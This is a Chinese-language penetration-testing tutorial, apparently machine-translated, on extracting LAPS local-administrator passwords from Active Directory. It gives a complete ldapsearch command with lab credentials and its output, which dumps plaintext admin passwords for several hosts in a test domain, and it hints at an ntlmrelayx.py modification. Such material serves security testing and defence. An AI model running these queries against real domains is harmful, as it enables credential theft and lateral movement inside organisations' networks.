假如你之前有对启用LAPS机制的主机进行浸透测验，那么你应该能体会到该机制的随机化本地管理员暗码是有多么令人苦楚。
LAPS将其信息存储在活动目录：
存储暗码过期时刻：ms-Mcs-AdmPwdExpirationTime: 131461867015760024
以明文显现的存储暗码：ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(
LAPS前期版别中，任何用户都能够读取活动目录中的内容。还好微软现已修正，现在你有必要取得该目标的一切扩展权限或者是彻底操控权限才能够进行拜访。

在杂乱的实在环境中，内网主机中还或许存在躲藏的OU权限管理员，乃至是具有彻底操控权限的，担任特定用户组的一个规范用户。
得益于Meatballs开发的Metasploit模块：https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_laps.rb 协助咱们完成了这项作业。可是咱们不或许每次都特别翻开一个Meterpreter会话来运转该模块吧？
运用ldapsearch(包括在Debian/Ubuntu的ldapscripts程序包中)能够被用来结构与该模块相同的恳求，以下就是一个比如：
ldapsearch -x -h 192.168.80.10 -D
"helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info"
"(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
解析：
-x – 运用根底身份验证
-h 192.168.80.10 – 将ldap衔接到域操控器
-D “helpdesk” -w ASDqwe123 – 以用户名helpdesk,暗码ASDqwe123进行登录
-b “dc=sittingduck,dc=info” – 加载整个域的根底LDAP目标
“(ms-MCS-AdmPwd=*)” – 过滤掉一切不能检查的ms-MCS-AdmPwd值 (只需具有满足的权限，乃至还能够获取Administrator暗码)
ms-MCS-AdmPwd – 仅显现ms-MCS-AdmPwd目标 (默许包括目标名以及DN，所以你仍是能知道主机从属关系)
运转状况如下：
$ ldapsearch -x -h 192.168.80.10 -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base  with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd
#
# DC1, Domain Controllers, sittingduck.info
dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F
# SDCLIENT_DAWIN7, LabComputers, Lab, sittingduck.info
dn: CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR
# SD_WSUS_2012, LabComputers, Lab, sittingduck.info
dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T
# WIN-PM0ID6F0AHN, LabComputers, Lab, sittingduck.info
dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(
# search reference
ref: ldap://research.sittingduck.info/DC=research,DC=sittingduck,DC=info
# search reference
ref: ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,D
 C=info
# search reference
ref: ldap://DomainDnsZones.sittingduck.info/DC=DomainDnsZones,DC=sittingduck,D
 C=info
# search reference
ref: ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info
# search result
search: 2
result: 0 Success
至从取得本地管理员暗码，但还没有确认该帐号是否启用，你能够运用Kerberos进行身份验证。因为Windows中域操控器对LDAP衔接不会要求证书验证(据我所知)，你只需在ntlmrelayx.py进行一些小修正就能转储LAPS暗码了;-)